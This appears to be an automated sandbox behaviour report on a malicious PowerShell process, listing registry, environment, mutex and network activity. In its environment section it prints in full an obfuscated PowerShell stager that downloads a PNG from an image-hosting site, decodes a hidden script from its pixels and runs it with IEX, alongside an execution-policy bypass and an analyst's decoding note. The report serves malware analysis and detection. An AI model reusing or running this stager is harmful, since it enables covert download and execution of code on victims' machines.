Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (4)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (8)
»
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (12)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Release - True 1
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (149)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 136
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = ComsPec, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = sULrV True 1
Fn
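Get Environment String name = sULrV, result_out = . ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36)) True 1
Note: the sULrV value is a string-concatenated PowerShell command. After its three placeholder tokens are substituted (9ax becomes a double quote, bSj becomes |, v6Q becomes $), it aliases New-Object, loads System.Drawing, opens the PNG at images2.imgbox.com through Net.WebClient, fills a 2140-byte array from the low four bits of each pixel's blue and green channels over a 428 x 5 pixel area, and passes the first 1908 bytes as ASCII text to IEX. The next-stage script is therefore fetched as image data rather than as a script file, which matches the single HTTPS session to images2.imgbox.com listed under Network Behavior. On hosts where PowerShell script block logging is available and enabled, the decoded script would be recorded there.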
Fn
Get Environment String name = comSpeC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (1)
»
Operation Additional Information Success Count Logfile
Resolve Name host = images2.imgbox.com, address_out = 66.254.122.104, 66.254.122.100, 66.254.122.102 True 1
Fn
TCP Sessions (1)
»
Information Value
Total Data Sent 373 bytes
Total Data Received 381.16 KB
Contacted Host Count 1
Contacted Hosts 66.254.122.104:443
TCP Session #1
»
Information Value
Handle 0x4e8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 66.254.122.104
Remote Port 443
Local Address 0.0.0.0
Local Port 49165
Data Sent 373 bytes
Data Received 381.16 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 66.254.122.104, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 122, size_out = 122 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 93, size_out = 93 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4588, size_out = 4588 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 331, size_out = 331 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4, size_out = 4 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 134, size_out = 134 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 117, size_out = 117 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 176, size_out = 176 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 160, size_out = 160 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 160, size_out = 160 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 2782 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 13634, size_out = 8928 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4706, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3254, size_out = 3254 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9060 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7356, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3884, size_out = 3884 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 1351 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2297, size_out = 2297 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9314 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7102, size_out = 7102 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 13234 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3182, size_out = 3182 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 4776 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11640, size_out = 11640 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 5030 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11386, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7914, size_out = 5240 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2674, size_out = 2674 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 3832 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 12584, size_out = 12584 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9010 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7406, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3934, size_out = 3220 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 714, size_out = 714 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 4848 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11568, size_out = 11568 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 1495 True 1
Fn
Data
